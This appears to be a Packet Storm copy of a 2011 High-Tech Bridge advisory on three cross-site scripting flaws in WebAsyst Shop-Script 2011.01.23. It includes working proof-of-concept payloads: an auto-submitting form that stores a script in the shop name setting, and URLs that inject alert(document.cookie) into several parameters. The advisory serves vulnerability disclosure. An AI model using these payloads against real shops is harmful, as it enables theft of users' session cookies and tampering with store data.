what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebAsyst Shop-Script 2011.01.23 Cross Site Scripting

WebAsyst Shop-Script 2011.01.23 Cross Site Scripting
Posted Feb 8, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

WebAsyst Shop-Script version 2011.01.23 suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 5903cb3b651f231ada8820726d8baea28a5c6b738758a594afd5ab3d57080ddf

WebAsyst Shop-Script 2011.01.23 Cross Site Scripting

Change Mirror Download
======================================
Vulnerability ID: HTB22818
Reference: http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_webasyst_shop_script.html
Product: WebAsyst Shop-Script
Vendor: WebAsyst, LLC ( http://www.shop-script.ru/ )
Vulnerable Version: Current version 2011.01.23 (shop-script.ru/demo/)
Vendor Notification: 25 January 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "SC/html/scripts/index.php" script to properly sanitize user-supplied input in "settingCONF_SHOP_NAME_en" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/SC/html/scripts/index.php?ukey=bsettings&settings_groupID=2" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="uri" value="http://1" />
<input type="hidden" name="settingCONF_SHOP_NAME_ru" value='shopname"><script>alert(document.cookie)</script>'>
<input type="hidden" name="settingCONF_SHOP_NAME_en" value='shopname"><script>alert(document.cookie)</script>'>
<input type="hidden" name="settingCONF_SHOP_URL" value="klyne.webasyst.net/shop/">
<input type="hidden" name="settingCONF_GENERAL_EMAIL" value="klyne19@mail.ru">
<input type="hidden" name="settingCONF_ORDERS_EMAIL" value="klyne19@mail.ru">
<input type="hidden" name="settingCONF_ENABLE_CONFIRMATION_CODE" value="1">
<input type="hidden" name="setting_DATEFORMAT" value="DD.MM.YYYY">
<input type="hidden" name="setting_CONF_STOREFRONT_TIME_ZONE" value="51">
<input type="hidden" name="setting_CONF_FIRST_WEEKDAY" value="0">
<input type="hidden" name="settingCONF_DEFAULT_TITLE_ru" value="klyne">
<input type="hidden" name="settingCONF_DEFAULT_TITLE_en" value="klyne - Online Store">
<input type="hidden" name="settingCONF_HOMEPAGE_META_KEYWORDS_ru" value="">
<input type="hidden" name="settingCONF_HOMEPAGE_META_KEYWORDS_en" value="">
<input type="hidden" name="settingCONF_HOMEPAGE_META_DESCRIPTION_ru" value="">
<input type="hidden" name="settingCONF_HOMEPAGE_META_DESCRIPTION_en" value="">
<input type="hidden" name="settingCONF_GOOGLE_MAPS_API_KEY" value="">
<input type="hidden" name="settingCONF_WAREHOUSE_ADDRESS" value="">
<input type="hidden" name="setting_CONF_PRINTFORM_COMPANY_LOGO" value="">
<input type="hidden" name="save" value="Save">

</form>
<script>
document.main.submit();
</script>


======================================
Vulnerability ID: HTB22819
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webasyst_shop_script_1.html
Product: WebAsyst Shop-Script
Vendor: WebAsyst, LLC ( http://www.shop-script.ru/ )
Vulnerable Version: Current version 2011.01.23 (shop-script.ru/demo/)
Vendor Notification: 25 January 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure to properly sanitize user-supplied input in "app" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/?app=UG"><script>alert(document.cookie)</script>

======================================
Vulnerability ID: HTB22817
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webasyst_shop_script.html
Product: WebAsyst Shop-Script
Vendor: WebAsyst, LLC ( http://www.shop-script.ru/ )
Vulnerable Version: Current version 2011.01.23 (shop-script.ru/demo/)
Vendor Notification: 25 January 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "SC/html/scripts/index.php" script to properly sanitize user-supplied input in "orderID_textbox" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/SC/html/scripts/index.php?did=21&order_search_type=SearchByOrderID&orderID_textbox=1"><script>alert(document.cookie)</script>&search=Show

http://host/SC/html/scripts/index.php?did=22&login=1"><script>alert(document.cookie)</script>&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close